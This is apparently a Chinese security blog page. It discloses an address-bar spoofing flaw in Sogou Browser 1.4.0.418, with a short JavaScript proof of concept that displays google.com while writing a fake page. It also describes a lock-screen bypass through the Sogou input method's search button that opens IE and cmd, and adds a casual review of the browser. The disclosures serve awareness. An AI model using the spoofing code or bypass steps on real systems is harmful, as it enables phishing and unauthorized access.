搜狗浏览器版本:1.4.0.418(正式版)
漏洞成因:在搜狗浏览器中,window.location和document.write两个函数发生条件竞争阻 塞。“window.location”函数使URL中显示到一个地址域,同时页面元素却可以被“document.write”函数所改写。这样导致攻 击者可以篡改页面,来实施钓鱼欺骗攻击。
效果图:
POC:
<center>
<h1>SogouExplorer spoofing</h1>
</center>
<p>
<a href=”javascript:spoof()”>test!</a>
<p>
<script>
function spoof()
{
window.location = “http://www.google.com”;
document.write(“<title>Google</title>”);
document.write(“<h1>FAKE PAGE</h1>”);
document.write(“xisigr[xeye]“);
}
</script>
SOGOU.COM 搜狗输入法 4.3
- Microsoft Windows 7 ultimate
搜狗输入法是在中国广泛使用的拼音输入法。 当用户登录到Windows系统并加载了搜狗输入法后,锁屏(cltr+alt+del)再切换到该输入法,在输入法的工具栏 中输入任意内容后点击“搜索”就会调用iexplorer.exe。如果登录账号属于管理员组,就可以直接在IE地址栏中进 入system32目录并运行cmd。阅读全文
浏览器的市场越来越混乱了,在IE一家独大的情况下,Firefox一直与之苦苦抗争,腾讯的TT、遨游、Opera等等。今年Google推出了Chrome,安全卫士360也推出了所谓的安全浏览器。现在搜狗继输入法后又开发出基于 IE 内核的搜狗浏览器,其宣传的不卡不死让我不以为然,我就不信你不死。当然,重要的还是教育网加速,这个相当牛逼的功能,相信大多数被囚禁在教育网内的用户都会喜欢的。
也许是还在beta版的缘故,基本功能除了借鉴了一些Firefox3的新设计之外,并没有太多亮点可言。而且内核也使用的是IE的。我想搜狗也没办法,国情啊,尤其是那万恶的网银,基本可以对IE核心的浏览器说:Only for you。
阅读全文
